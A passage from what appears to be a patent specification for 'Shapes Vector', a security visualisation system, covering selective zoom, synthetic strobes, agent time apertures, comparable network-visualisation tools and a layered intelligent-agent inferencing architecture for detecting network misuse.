While the above two mechanisms can surely find utility, selective zoom also provides a more sophisticated “winnowing” facility. This facility caters to a typical phenomenon in the way humans “sift” through data sets until they arrive at a suitable subset for analysis. In the case of focusing on a particular set of objects in order to undertake some inductive or deductive analysis, a human may quickly select a broad class of objects for initial analysis from the overall view despite a prion knowing that the selection may not be optimal. The user typically then undertakes either a refinement (selecting a further subset) or putting the data aside as a reference while reforming the selection criteria for selection. After applying the new criteria, the user may then use the reference for refinement, intersection, or union with previous criteria depending on what they see.
Via selective zoom (perhaps raised above the main view plane), a user can perform a selective zoom on a zoomed subset. This procedure can be undertaken re-cursively, all the while making subsets from the previous relative zoom. The effect can be made like a “staircasing” of views. FIG. 9 (segments two and three) depicts the use of selective zoom where subsets of nodes have been placed above the main view plane. Note the set of nodes to the left were produced by a previous use of the zoom. This set need not be a subset of the current staircase.
Indeed the set to the left can be used to form rapidly a new selection criterion. The effects can be described by simple set theory. As implied above a user may also select any of the zoomed sets and translate them to another part of the field of view. These sets can also then be used again to form unions and intersections with other zoomed views or subsets of views that are generated from the main view.
Segment one of FIG. 9 depicts the same view from above. Note the schematic style.
VDI has produced a visualisation toolkit in which a particular application depicts a set of machine nodes. By clicking on a representation of a node, it is “raised” from the map and so are the nodes to which it is connected. This may be interpreted as a simple form of one aspect of selective zoom. However, it is unclear whether this VDI application is capable of the range of features forming a generalised selective zoom. For example, the capability to implement set translation in three dimensional Cartesian space, along with union and intersection for rapid reselection and manipulation of arbitrary view sets, as well as relative size adjustment based on class, instance, or object attribute properties.
6 Temporal Hierarchies
Temporal hierarchies refer to three perceived issues: synthetic strobes along both directions of the temporal axis; user information overload, and dealing with data streams with Intelligent Agents. We discuss each in turn.
6.1 Strobes Revisited
In Section 5 we introduced the notion of a synthetic strobe which can be used to shunt rapid periodic behaviour along a “temporal axis” so that the behaviour becomes discernible to the human eye. This shunting was necessary since many patterns of behaviour occur far too rapidly (e.g. characteristics of packet flow and their contents). However, a limitation of synthetic strobes as described is that they shunt or map patterns in only one direction along the temporal axis. More precisely, rapid behaviour is shunted into a “slower” domain. Yet some behaviour of security significance may require a view which spans a relatively long time. Hence it was hypothesised that strobes must be able to not only show up rapid behaviour, but also show slow behaviour. To do this, Shapes Vector must be able to store events, and then be able to map a strobe over them in order to display the possible pattern. Essentially, it is preferable to be able to map behaviour, which can occur along a broad front of the temporal axis into a much smaller domain, which is perceptible to Humans. As an aside, it is a well known technique to see patterns of motion in the cosmos by strobing and playing at high speed various observations, e.g. star field movement to ascertain the celestial poles. However, what we propose here, apart from the relative novelty of taking this concept into cyberspace, is the additional unusual mechanism of complex trigger events in order to perceive the “small” events, which carry so much import over “long” time periods. We can assign triggers and functions on a scale not really envisaged even in terms of cosmological playback mechanisms.
Elsewhere, we discuss many other issues related to synthetic strobes. For example, the mechanisms for setting complex trigger conditions via “trigger boxes”, the need for “synthetic time”, its relation to real time, and generated strobe effects.
6.2 User Information Overload
Another reason for using strobes, even if the pattern is already within the temporal perception domain of the user, is that they can highlight potentially important behaviour from all the “clutter”. Visualisation itself is a mechanism whereby certain trends and macro events can be perceived from an information rich data set. However, if related or semantically similar events rnix together, and a particular small event is to be correlated with another, then some form of highlighting is needed to distinguish it in the visual environment. Without this sort of mechanism, the user may suffer data overload. Synthetic strobes designed to trigger on specific events, and which only affect particular classes of objects, are surrnised to provide one mechanism to overcome this expected problem.
6.3 Data Streams and IA's
One of the fundamental problems facing the use of IA's in the Shapes Vector system is the changing status of propositions. More precisely, under temporal shifts, all “facts” are predicates rather than propositions. This issue is further complicated when we consider that typical implementations of IA's do not handle temporal data strearns. We address this problem by providing each IA with a “time aperture” over which it is currently processing. A user or a higher level agent can set the value of this aperture. Any output from an IA is only relevant to its time aperture setting (FIG. 10). The aperture mechanism allows the avoidance of issues such as contradictions in facts over time, as well providing a finite data set in what is really a data stream. In fact, the mechanism being implemented in our system permits multiple, non-intersecting apertures to be defined for data input.
With time apertures, we can “stutter” or “sweep” along the temporal domain in order to analyse long streams of data. Clearly, there are a number of issues, which still must be dealt with. Chief amongst these is the fact that an aperture may be set which does not, or rather partially, covers the data set whereby a critical deduction must be made. Accordingly, strategies such as aperture change and multiple apertures along the temporal domain must be implemented in order to raise confidence that the relevant data is input in order to arrive at the relevant deduction.
While we are aware that we can implement apertures in order to supply us with useful deductions for a number of circumstances, it is still an open question as to how to achieve a set of sweep strategies for a very broad class of deductions where confidence is high that we obtain what we are scanning for. One area, which comes to mind, is the natural “tension” between desired aperture settings. For example, an aperture setting of 180 degrees (ie., the whole fact space) is desirable as this considers all data possible in the stream form the beginning of the epoch of capture to the end of time, or rather the last data captured. However, this setting is impractical from an implementation point of view, as well as introducing contradictions in the deductive process. On the other hand, a very small aperture is desirable in that implementation is easy along with fast processing, but can result in critical packets not being included in the processing scan.
7 Other Visualisation Efforts
Various techniques of visualisation have over the years been applied to the analysis of different domains of abstract data, with varying success. Several such attempts bear similarities to portions of the Shapes Vector system, either in the techniques employed or the broad aims and philosophies guiding those techniques. In this section we briefly describe the most significant of these related visualisation efforts, concentrating on the specific domains of security visualisation, network visualisation and communications-related data mining.
The following discussion providing some background to the invention is intended to facilitate a better understanding of the invention. However, it should be appreciated that the discussion is not an acknowledgment or admission that any of the material referred to was published, known or part of the common general knowledge in any relevant country as at the priority date of the application.
7.1 NetPARS
A proposal from NRaD and the NRL, the Network Propagation Assessment and Recovery System (NetPARS) is an effort to assist decision making in defensive information warfare. It aims to supply such support by means of rigorously tracking data quality within a system and estimating how degradations in quality propagate between data. Such a protocol would, it is claimed, be capable of providing intrusion detection services, assessment of security state and assist in recovery following an attack.
The proposed system architecture incorporates a set of mapping agents (responsible for keeping track of inter-relationships between data), sensor elements (capable of detecting intrusions and other reductions in data quality) and recovery elements. When a sensor detects the compromise of one or more data item, the system computes (via a forward propagating expert system) the extent to which this loss in quality is propagated to other data. This information is presented to the user to assist in the defence and/or containment of the compromise.
Ultimately it is envisaged that NetPARS will also incorporate a second knowledge engine. This takes a reported reduction in data quality and, by backward propagation, determines the tree of data items which could conceivably have been the initial cause of that reduction. This fault tree is a principal input to the process of recovery.
Although only sketchy details of the NetPARS proposal are available at present, the system would appear to have some superficial similarities to Shapes Vector. Both, make use of forward and backward propagation of knowledge through a set of rules (although the function of backward propagation is quite different in the two systems). Also, both NetPARS and Shapes Vector incorporate agents, which are tasked with intrusion detection as an aid towards a human response. However, whereas the Shapes Vector architecture incorporates a broad range of such agents, it seems that the intrusion detection functionality of NetPARS is currently limited to a single class of attack (storage spoofing).
Beyond these superficial resemblances the two systems have little in common. NetPARS appears to place less importance upon visualisation technology, while in Shapes Vector this is an easily realisable feature where several novel visualisation techniques have been proposed. The NRaD/NRL proposal appears to focus heavily on a tight domain of data and its inter-relationship, while the Shapes Vector system aims to model a much larger concept space with a comprehensive ontology. Ontology can be made relevant to a great variety of application areas. Computer security as discussed in this specification is but one example. Shapes Vector also includes a potentially very powerful temporal control mechanism as well as intelligent agent architecture with user semantic bindings.
7.2 Security Visualisation
Eagle Netwatch is a commercial software package written by Raptor Systems Inc., which offers system administrators a visual representation of the security of their (firewall protected) network. The network is displayed by the tool as an interconnected set of coloured solids positioned in a three-dimensional virtual world. By replaying audit trails collected on the firewall this display is animated to illustrate particular gateway events which pertain to the system's security. During the playback of this security “movie,” the user can rotate the virtual world to more clearly observe the activities of particular network elements. The tool also offers other visualisations of audit logs, most notably two-dimensional plots of gateway statistics against time.
The basic concept underlying Eagle Netwatch—that by observing events in a visual representation of the network a (human user) may notice patterns signifying security events—is similar to the Shapes Vector philosophy as described in Section 3. However, at the time of writing this information the Netwatch tool lacks much of the sophistication of the Shapes Vector environment including the capacity for real-time visualisation, the presence of intelligent deductive agents, the possibility of remote discovery and visual mechanisms for recognising temporal patterns.
7.3 Network Visualisation
AT&T Bell have constructed a set of prototype tools, collectively called SeeNet which provide tools for the visualisations of telecommunications traffic. The system displays the traffic between two locations by drawing a line on a two-dimensional geographical map. Line width and colour convey aspects of that traffic (e.g., volume). In visualising traffic on an international scale, the resulting map is typically wrapped around a sphere to give the impression of the globe. By observing trends in the visualised traffic, key performance bottlenecks in real-world telecommunications services (including the Internet) have been identified. Also by investigating observed “hot spots” in these representations, AT&T have been able to identify fraudulent use of their facilities.
A similar visualisation approach has been adopted by British Telecom in a prototype system for observing the parameters of their communications network. An outline map of Britain is overlaid with a representation of the BT network with a “skyscraper” projecting upwards& from each switching node. The height of the skyscraper denotes the value of the metric being visualised (e.g., traffic or number of faults). The user can navigate freely through the resulting 3D environment. A second visualisation attempt undertaken by British Telecom considers a different three-dimensional visualisation of the communication network as an aid for network architects. A similar approach has been adopted by IBM's Zurich Research Laboratories in their construction of a tool for visualising a computer network's backbone within a full three-dimensional virtual (VRML) world. The goal of this latter system is to ease the task of administering such network backbones.
While Shapes Vector can render similar scenes via its Geo View methods, there is little else in common because of the existence of Data View, Selective View and Strobe when used as part of the visual element. The agent architecture and other elements further distinguish the Shapes Vector system.
7.4 Data Mining
The mining and visualisation of large data sets for the purpose of extracting semantic details is a technique that is applied to many application domains. Several recent efforts have considered such approaches for deriving visual metrics for web-server performance and also for conveying the inter-relatedness of a set of HTML documents. Research undertaken by the NCSA considers the first of these types of data mining in an immersive virtual reality environment called Avatar. The basic approach adopted in their performance measurement work is to construct a virtual world of “scattercubes”, regions of space in which three of the many measured metrics are plotted against one another. The world contains enough scattercubes that every set of three metrics is compared in at least one. Users can browse this virtual world using either head-mounted displays or a virtual reality theatre, walking within a single cube and flying over the whole aggregation of cubes. More recently this same system has also been used for visualising the performance of massively parallel programs.
Other data-mining work has considered the derivation of semantics related to the interconnections of WWW-based information. The WAVE environment from the University of Arkansas aims to provide a 3D visualisation of a set of documents grouped according to conceptual analysis. Work at AT&T Bell considers plots of web-page access patterns which group pages according to their place in a web site's document hierarchy.
These efforts can be rendered with Shapes Vector's Data View display. The Avtar effort does not, however, share the Shapes Vector system's ability to effectively provide a semantic link between such data-oriented displays and geographic (or more abstract) views of the entities under consideration, nor represent the force paradigm's represented in Data View.
7.5 Parentage and Autograph
Parentage and its successor Autograph are visualisation tools constructed by the NSA for assisting analysts in the task of locating patterns and trends in data relating to operating communications networks. The tools act as post-processors to the collected data, analysing the interactions between senders and receivers of communications events. Based on this analysis the tools produce a representation of the network as a graph, with nodes describing the communications participants and the edges denoting properties of the aggregated communication observed between participants.
The user of the system may choose which of a pre-defined palette of graph layouts should be used to render the graph to the screen. The scalability of the provided layouts is limited and, as a means of supporting large data-sets, the tool allows for the grouping of nodes into clusters which are represented as single nodes within the rendered graph. Additionally, facilities exist for the displayed graph to be animated to reflect temporal aspects of the collected data.
While the aims of the Parentage and Autograph systems have some intersection with the visual sub-systems of Shapes Vector, the systems differ in a number of important regards. Firstly, the NSA software is not designed for real-time analysis options. Secondly, the displays generated by Parentage and Autograph are not intended to provide strong user customisation facilities: the user may choose a layout from the provided palette, but beyond this no control of the rendered graph is available. Contrast this with the Shapes Vector approach which stipulates that each of the views of the security domain must be extremely customable to cater to the different abilities of users to locate patterns in the visual field (see Section 3).
It is interesting to note that this last point has been observed in practical use of Parentage and Autograph: while the provided visual palette allows some analysts to easily spot significant features, other users working with the same tools find it more difficult to locate notable items.
Appendix Part 1—Custom Control Environments for Shapes Vector
As described in the body of this section of the specification, the Shapes Vector system is a tool based upon the fundamental assertion that a user can visually absorb a large body of security-relevant data, and react. For such a capability and for a response to be effective, the Shapes Vector user must have access to a broad range of hardware peripherals, each offering a different style of interaction with the system. Section 2.2 of this part, describes the types of peripherals, which are present within the current system.
The exact physical configuration of peripherals presented to a user of the Shapes Vector system will depend upon the needs of the ‘role’ that user is playing within the (collaborative) information operation. It is considered that there are two types of operational roles: strategic/planning and tactical. Peripheral configurations catering to the specific interactive needs of users operating in each of these modes are outlined below.
A.1 Strategic Environment
Since the principal functions of a strategic Shapes Vector user focus primarily on non-real-time manipulation of data, there is little demand for speedy forms of interaction such as that afforded by joysticks and spaceballs. Instead, the core interactions available within this environment must be extremely precise: we envisage the use of conventional modes such as keyboard entry of requests or commands coupled with the gesture selection of items from menus (e.g. by mouse). Thus we would expect that a strategic Shapes Vector station might consist of a configuration similar to the traditional workstation: e.g., a desk with screen, Keyboard and mouse atop.
A.2 Tactical Environment
In the course of a Shapes Vector information operation, one or more of the operations team will be operating in a tactical mode. In such a mode, real-time data is being continually presented to the user and speedy (real-time) feedback to the system is of critical importance. Such interactions must primarily be made through high-bandwidth stream-based peripherals such as joysticks and dials. The complexity of the virtual environment presented by Shapes Vector suggests that a high number of different real-time interactions may be possible or desirable.
To provide a capacity for quickly switching between these possible functions, we choose to present the user with a large number of peripherals, each of which is responsible for a single assigned interaction. Since some system interactions are more naturally represented by joysticks (e.g. flying through the virtual cyberspace) while others are more intuitively made using a dial (e.g. synthetic strobe frequency) and so on, we must also provide a degree of variety in the peripheral set offered to the user.
The technical issues involved in providing a large heterogeneous peripheral set in a traditional desktop environment are prohibitive. To this end a preferred design for a custom tactical control environment has been developed. The user environment depicted in FIG. 11 achieves the goal of integrating a large number of disparate input peripherals into a dense configuration such that a user may very quickly shift and apply attention from one device to another.
The following input devices are incorporated into a preferred Shapes Vector Tactical Control Station depicted in FIG. 11:
• two joysticks
• rudder pedals (not visible in the figure)
• two dial/switch panels
• keyboard (intended for the rare cases where slow but precise interaction is necessary)
• trackball
The principal display for the tactical user is a large projected screen area located some distance in front of the control station. However, a small LCD screen is also provided for displaying localised output (e.g. the commands typed on the keyboard).
PART 2 SHAPES VECTOR MASTER ARCHITECTURE 1. Introduction
The fundamental aspects of the Intelligent Agent Architecture (IAA) for the Shapes Vector system are discussed in this Part of the specification. Several unusual features of this architecture include a hierarchy of context free agents with no peer communication, a specific method for constructing ontologies which permits structured emergent behaviour for agents fusing knowledge, and the ability to undertake a semantic inferencing mechanism which can be related to human interfacing.
1.1 Shapes Vector Master Architecture
The master architecture diagram (FIG. 1) shows six main sub-systems to Shapes Vector:
• Sensor system. This sub-system comprises sensors that collect data. A typical example would be an Ethernet packet sniffer. Sensors may be local or remote and the communication path from the sensor and the rest of the system can take many forms ranging from a UNIX socket, through to a wireless network data link.
• The Intelligent Agent Architecture (Gestalt). This sub-system, described extensively in this paper, is responsible for processing sensor data and making intelligent deductions based on that input.
• The Tardis. This sub-system is a real time manager of events and a global semantic mapper. It also houses the synthetic clock mechanism that is discused in a later Part of this specification. The Tardis is capable of taking deductions from the Agent Gestalt and mapping them to an event with a specific semantic ready for visualisation.
• The Visuals. This sub-system actually comprises a number of “view” modules that can be regarded as sub-systems in their own right. Each view is built from common components, but visualises events input to it from the Tardis according to a fundamental display paradigm. For example, Geoview displays events and objects based on a geographic location paradigm (wherein it is possible to layout objects according to a space coordinate system. Multiple interpretations of the layout are possible. A typical use though is to layout computers and other physical objects according to their physical location.), whereas DataView lays out objects based on the level of interaction (forces) between them.
• The I/O system. This sub-system provides extensive faculties for users to navigate through the various views and interact with visualised objects.
• The Configuration system. This sub-system offers extensive features for customising the operation of all of the various sub-systems.
Essentially, the system operates by recording data from the sensors, inputting it into the Agent Gestalt, where deductions are made, passing the results into the Tardis, which then schedules them for display by the visualisation sub-system.
1.2 Precis of this Part of the Specification.
Portions of the information contained in the following sections will be a repeat of earlier sections of the specification. This is necessary due to the very large amount of information contained in this document and the need to refresh the readers memory of the information in the more detailed context of this part. Section 2 of this part discusses the fundamentals of the agent architecture, which includes a discourse on the basic inferencing strategies for Shapes Vector agents. These inferencing strategies, described in Section 3 of this part are based on epistemic principles for agents with a “low level of abstraction” to a semantic vector based scheme for reasoning under uncertainty. Of interest is the method utilised to link an agent's semantics with the semantics of interaction with a user. This link is achieved by adjusting and formalising a highly restricted subset of English.
In Section 4 of this part the basic rules of constructing an agent are described and of how they must inhabit the architectural framework. The architectural framework does not preclude the introduction of “foreign” agents as long as an interface wrapper is supplied to permit it to transfer its knowledge and deduction via the relevant ontological interfaces.
Section 5 of this part discusses the temporal aspects of intelligent agents. Section 6 of this part reveals some implications for the development of higher abstraction levels for agents when considering the fusing of data from lower abstraction level agents. The ontological basis for the first of these higher levels—levels 2—are detailed in Section 7 of this part.
Section 8 of this part gives a brief overview of the requirement for intelligent interfaces with which a user may interact with the various elements of an agent Gestalt. Section 9 of this part provides some general comments on the architecture, while Section 10 of this part contrasts the system with the high-level work of Bass.
2. The Agent Architecture
Shapes Vector is intended to house large numbers of Intelligent Agents (IA's), with different domains of discourse. These agents make inferences and pass knowledge to one another in order to arrive at a set of deductions that permit a user to make higher level hypotheses.
2.1 Agent Architecture
The Shapes Vector system makes use of a multi-layer multi-agent knowledge processing architecture. Rather than attempting to bridge the entire semantic gap between base facts and high-level security states with a single software entity, this gap is divided into a number of abstraction layers. That is, we begin by considering the problem of mapping between base facts and a marginally more abstract view of the network. Once this (relatively easy) problem has been addressed, we move on to considering another layer of deductive processing from this marginally more abstract domain, to a yet more abstract domain. Eventually, within the upper strata of this layered architecture, the high-level concepts necessary to the visualisation of the network can be reasoned about in a straightforward and context-free fashion.
The resulting Shapes Vector Knowledge Architecture (SVKA) is depicted in FIG. 7. The layered horizontal boxes within the figure represent the various layers of knowledge elements. At the very bottom of the figure lies the store of all observed base facts (represented as a shaded box). Above this lies a deductive layer (termed “Level 1” of the Knowledge Architecture) which provides the first level of translation from base fact to slightly more abstract concepts.
In order to achieve knowledge transfer between agents which is both consistent and sound, an ontology (ie. a formal knowledge representation) becomes imperative. Due to our approach of constructing our knowledge processing sub-system as a set of abstraction layers, we must consider knowledge exchange at a number of different levels of abstraction. To construct a single ontology capable of expressing all forms of knowledge present within the system is problematic due to the breadth of abstraction. Attempting such ontology it is unlikely to produce a tidy set of universal rules, and far more likely to produce a complex family of inter-related concepts with ad-hoc exceptions. More likely, due to the total domain of discourse being so broad, ontology produced in this manner will be extremely context sensitive, leading to many possibilities for introducing ambiguities and contradictions.
Taking a leaf from our earlier philosophy of simplification through abstraction layering, we instead choose to define a set of ontologies: one per inter-layer boundary. FIG. 7 indicates these ontologies as curved arrows to the left of the agent stack.
The commnunication of factual knowledge to IAs in the first level of abstraction is represented by means of a simple ontology of facts (called the Level 1 Shapes Vector Ontology). All agents described within this portion of the specification make use of this mechanism to receive their input. It is worthwhile noting that the knowledge domain defined by this ontology is quite rigidly limited to incorporate only a universe of facts—no higher-level concepts or meta-concepts are expressible in this ontology. This simplified knowledge domain is uniform enough that a reasonably clean set of ontological primitives can be concisely described.
Interaction between IA's is strictly limited to avoid the possibility of ambiguity. An agent may freely report outcomes to the Shapes Vector Event Delivery sub-system, but inter-IA communication is only possible between agents at adjacent layers in the architecture. It is specifically prohibited for any agent to exchange knowledge with a “peer” (an agent within the same layer). If communication is to be provided between peers, it must be via an intermediary in an upper layer. The reasons underlying these rules of interaction are principally that they remove chances for ambiguity by forcing consistent domain-restricted universes of discourse (see below). Furthermore, such restrictions allow for optimised implementation of the Knowledge Architecture.
One specific optimisation made possible by these constraints—largely due to their capacity to avoid ambiguity and context—is that basic factual knowledge may be represented in terms of traditional context-free relational calculus. This permits the use of relational database technology in storage and management of knowledge. Thus, for simple selection and filtering procedures on the knowledge base we can utilise well known commercial mechanisms which have been optimised over a number years rather than having to build a custom knowledge processor inside each intelligent agent.
Note that we are not suggesting that knowledge processing and retrieval is not required in an IA. Rather that by specifying certain requirements in a relational calculus (SQL is a preferable language), the database engine assists by undertaking a filtering process when presenting a view for processing by the IA. Hence the IA can potentially reap considerable benefits by only having to process the (considerably smaller) subset of the knowledge base which is relevant to the IA. This approach becomes even more appealing when we consider that the implementation of choice for Intelligent Agents is typically a logic language such as Prolog. Such environments may incur significant processing delays due to the heavy stack based nature of processing on modern Von Neumann architectures. However, by undertaking early filtering processes using optimised relational engines and a simple knowledge structure, we can minimise the total amount of data that is input into potentially time consuming tree and stack-based computational models.
The placement of intelligent agents within the various layers of the knowledge architecture is decided based upon the abstractions embodied within the agent and the knowledge transforms provided by the agent. Two criteria are considered in determining whether a placement at layer n is appropriate:
• would the agent be context sensitive in the level n ontology? If so, it should be split into two or more agents.
• does the agent perform data fusion from one or more entities at level n? If so it must be promoted to at least level n+1 (to adhere to the requirement of no “horizontal” interaction)
2.2 A Note on the Tardis
A more detailed description of the Tardis is provided in part 5 of the specification.
The Tardis connects the IA Gestalt to the real-time visualisation system. It also controls the system's notion of time in order to permit facilities such as replay and visual or other analysis anywhere along the temporal axis from the earliest data still stored to the current real world time.
The Tardis is unusual in its ability to connect an arbitrary semantic or deduction to a visual event. It does this by acting as a very large semantic patch-board. The basic premise is that for every agreed global semantic (e.g. X window packet arrived [attribute list]) there is a specific slot in an infinite sized table of globally agreed semantics. For practical purposes, there are 264 slots and therefore the current maximum number of agreed semantics available in our environment. No slot, once assigned a semantic, is ever reused for any other semantic. Agents that arrive at a deduction, which matches the slot semantic, simply queue an event into the slot. The visual system is profiled to match visual events with slot numbers. Hence visual events are matched to semantics.
As for the well-known IP numbers and Ethernet addresses, the Shapes Vector strategy is to have incremental assignment of semantics to slots. Various taxonomies etc. are being considered for slot grouping. As the years go by, it is expected that some slots will fall into disuse as the associated semantic is no longer relevant, while others are added. It is considered highly preferable for obvious reasons, that no slot be reused.
As mentioned, further discussion about the Tardis and its operation can be found in part 5 of the specification.
3. Inferencing Strategies
The fundamental inferencing strategy underlying Shapes Vector is to leave inductive inferencing as the province of the (human) user and deductive inferencing as typically the province of the IA's. It is expected that a user of the system will examine deductive inferences generated by a set of IA's, coupled with visualisation, in order to arrive at an inductive hypothesis. This separation of duties markedly simplifies the implementation strategies of the agents themselves. Nevertheless, we propose further aspects that may produce a very powerful inferencing system.
3.1 Traditional
Agents can employ either forward chaining or backward chaining, depending on the role they are required to fulfil. For example, some agents continuously comb their views of the knowledge base in attempts to form current, up to date, deductions that are as “high level” as possible. These agents employ forward chaining and typically inhabit the lower layers of the agent architecture. Forward chaining agents also may have data stream inputs from low level “sensors”. Based on these and other inputs, as well as a set of input priorities, these agents work to generate warnings when certain security-significant deductions become true.
Another set of agents within the Shapes Vector system will be backward chaining (goal driven) agents. These typically form part of the “User Avatar Set”: a collection of knowledge elements, which attempt to either prove or disprove user queries (described more fully in Section 8 of this part.).
3.2 Possiblistic
In executing the possiblistic features incorporated into the level 2 ontology (described in Section 7.1 of this part), agents may need to resort to alternative logics. This is implied by the inherent multi-valued nature of the possiblistic universe. Where a universe of basic facts can be described succinctly in terms of a fact existing or not existing, the situation is more complex when symbolic possibility is added. For our formulation we chose a three-valued possiblistic universe, in which a fact may be existent, non-existent, or possibly existent.
To reason in such a universe we adopt two different algebra's. The first a simple extension of the basic principle of unification common to computational logic. Instead of the normal assignation of successful unifaction to existence and unsuccessful unification to non-existence, we adopt the following:
• successful unification implies existence,
• the discovery of an explicit fact which precludes unification implies non-existence (this is referred to this as a hard fail),
• unsuccessful unification without an explicit precluding case implies possible existence (this is referred to as a soft fail)
A second algebra, which may be used to reason in the possiblistic universe, involves a technique known as “predicate grounding” in which a user-directed pruning of a unification search allows for certain specified predicates to be ignored (grounded) when possibilities are being evaluated.
3.3 Vectors
Agents operating at higher levels of the Shapes Vector Knowledge Architecture may require facilities for reasoning about uncertain and/or incomplete information in a more continuous knowledge domain. Purely traditional forward or backward chaining does not easily express such reasoning, and the three-valued possiblistic logic may lack the necessary quantitative features desired. To implement such agents an alternative inferencing strategy is used based upon notions of vector algebra in a multi-dimensional semantic space. This alternative strategy is employed in conjunction with more conventional backward chaining techniques. The use of each of the paradigms is dependent on the agent, and the domain of discourse.
Our vector-based approach to inferencing revolves around constructing an abstract space in which relevant facts and deductions may be represented by geometrical analogues (such as points and vectors), with the proper algebraic relationships holding true. In general, the construction of such a space for a large knowledge domain is extremely difficult. For Shapes Vector, we adopt a simplifying strategy of constructing several distinct deductive spaces, each limited to the (relatively small) domain of discourse of a single intelligent agent. The approach is empirical and is only feasible if each agent is restricted to a very small domain of knowledge so that construction of its space is not overly complex.
The definition of the deductive space for an IA is a methodical and analytical process undertaken during the design of the agent itself. It involves a consideration of the set of semantic concepts (“nouns”) which are relevant to the agent, and across which the agent's deductions operate. Typically this concept set will contain elements of the agent's layer ontology as well as nouns which are meaningful only within the agent itself. Once the agent's concept set has been discovered, we can identify within it a subset of ‘base nouns’—concepts which cannot be defined in terms of other members of the set. This identification is undertaken with reference to a semi-formal ‘connotation spectrum’ (a comparative metric for ontological concepts).
Such nouns have two important properties:
• each is semantically orthogonal to every other base noun, and
• every member of the concept set which is not a base noun can be described as a combination of two or more base nouns.
Collectively, an IA's set of n base nouns defines a n-dimensional semantic space (in which each base noun describes an axis). Deductions relevant to the agent constitute points within this space; the volume bounded by spatial points for the full set of agent deductions represents the sub-space of possible outputs from that agent. A rich set of broad-reaching deductions leads to a large volume of the space being covered by the agent, while a limited deduction set results in a very narrow agent of more limited utility (but easier to construct). Our present approach to populating the deductive space is purely empirical, driven by human expert knowledge. The onus is thus upon the designer of the IA to generate a set of deductions, which (ideally) populate the space in a uniform manner.
In reality, the set of deductions that inhabit the space can become quite non-uniform (“clumpy”) given this empirical approach. Hence rigorous constraint on the domain covered by an agent is entirely appropriate. Of course this strategy requires an appropriate mechanism at a higher abstract layer. However, the population of a higher layer agent can utilise the agents below them in a behavioural manner thereby treating them as sub-spaces.
Once an agent's deductive space has been constructed and populated with deductions (points), it may be used to draw inferences from observed facts. This is achieved by representing all available and relevant facts as vectors in the multi-dimensional semantic space and considering how these vectors are located with respect to deduction points or volumes. A set of fact vectors, when added using vector algebra may precisely reach a deduction point in the space. In that situation, a deductive inference is implied. Alternatively, even in the situation where no vectors or combinations of vectors precisely inhabits a deduction point, more uncertain reasoning can be performed using mechanisms such as distance metrics. For example, it may be implied that a vector, which is “close enough” to a deduction point, is a weak indicator of that deduction. Furthermore, in the face of partial data, vector techniques may be used to hone in on inferences by identifying Facts (vectors), currently not asserted, which would allow for some significant deduction to be drawn. Such a situation may indicate that the system should perhaps direct extra resources towards discovering the existence (or otherwise) of a key fact.
The actual inferencing mechanism to be used within higher-level Shapes Vector agents is slightly more flexible than the scheme we have described above. Rather than simply tying facts to vectors defined in terms of the IA's base nouns, we can define an independent but spatially continuous ‘fact space’. FIG. 8 demonstrates the concept: a deductive space has been defined in terms of a set of base nouns relevant to the IA. Occupying the same spatial region is a fact space, whose axes are derived from the agent's layer ontology. Facts are defined as vectors in this second space: that is, they are entities fixed with respect to the fact axes. However, since the fact space and deduction space overlap, these fact vectors also occupy a location with respect to the base noun axes. It is this location which we use to make deductive inferences based upon fact vectors. Thus, in the Figure, the fact that the observed fact vector (arrow) is close to one of the deductions (dots) may allow for assertion of that deduction with a particular certainty value (a function of exactly how close the vector is to the deduction point). Note that, since the axes of the fact space are independent of the axes of the deductive space, it is possible for the former to vary (shift, rotate and/or translate, perhaps independently) with respect to the latter. If such a variation occurs, fact vectors (fixed with regard to the fact axes) will have different end-points in deduction-space. Therefore, after such a relative change in axes, a different set of deductions may be inferred with different confidence ratings. This mechanism of semantic relativity may potentially be a powerful tool for performing deductive inferencing in a dynamically changing environment.
An interesting aspect of the preferred approach to vector-based deductive inference is that it is based fundamentally upon ontological concepts, which can in turn be expressed as English nouns. This has the effect that the deductions made by an agent will resemble simple sentences in a very small dialect of pseudo-English. This language may be a useful medium for a human to interact with the agent in a relatively natural fashion.
While the inferencing strategy described above has some unorthodox elements in its approach to time-varying probabilistic reasoning for security applications, there are more conventional methods that may be used within Shapes Vector IA's in the instance that the method falls short of its expected deductive potential. Frame based systems offer one well understood (although inherently limited) alternative paradigm. Indeed, it is expected that some IA's will be frame based in any case (obtained off the shelf and equipped with ontology to permit knowledge transfer with the knowledge base).
As described above, the vector-based deductive engine is able to make weak assertions of a deduction with an associated certainty value (based on distances in n-Dimensional space). This value can be interpreted in a variety of ways to achieve different flavours of deductive logic. For example, the certainty value could potentially be interpreted as a probability of the assertion holding true, derived from a consideration of the current context and encoded world knowledge. Such an interpretation delivers a true probabilistic reasoning system. Alternatively, we could potentially consider a more rudimentary interpretation wherein we consider assertions with a certainty above a particular threshold (e.g. 0.5) to be “possible” within a given context. Under these circumstances, our system would deliver a possiblistic form of reasoning. Numerous other interpretations are also possible.
3.4 Inferencing for Computer Security Applications
As presented, our IA architecture is appropriate to knowledge processing in any number of domains. To place the work into the particular context, for which it is primarily intended, we will now consider a simple computer security application of this architecture.
One common, but often difficult, task facing those charged with securing a computer network is detecting access of network assets which appears authorised (e.g., the user has the proper passwords etc) but is actually malicious. Such access incorporates the so-called “insider threat” (i.e., an authorised user misusing their privileges) as well as the situation where confidentiality of the identification system has been compromised (e.g., passwords have been stolen). Typically, Intrusion Detection Systems are not good at detecting such security breaches, as they are purely based on observing signatures relating to improper use or traffic.
Shapes Vector's comprehensive inferencing systems allow it to deduce a detailed semantic model of the network under consideration. This model coupled with a user's inductive reasoning skills, permits detection of such misuse even in the absence of any prior-known “signature”.
This application of Shapes Vector involves constructing a Gestalt of Intelligent Agents that are capable of reasoning about relatively low-level facts derived from the network. Typically these facts would be in the form of observations of traffic flow on the network. Working collaboratively, the agents deduce the existence of computers on the network and their intercommunication. Other agents also deduce attributes of the computers and details of their internal physical and logical states. This information serves two purposes: one is to build up a knowledge base concerning the network, and another is to facilitate the visualisation of the network. This latter output from the agents is used to construct a near real-time 3D visualisation showing the computers and network interfaces known to exist and their interconnection. Overlaid onto this “map” is animation denoting the traffic observed by the agents, classified according to service type.
Observing such a Shapes Vector visualisation a user may note some visual aspect that they consider being atypical. For example, the user may note a stream of telnet packets (which itself might be quite normal) traversing the network between the primary network server and node which the visualisation shows as only a network interface. The implications of such an observation are that a node on the network is generating a considerable body of data, but this data is formatted such that none of the Shapes Vector agents can deduce anything meaningful about the computer issuing the traffic (thus no computer shape is visualised, just a bare network interface).
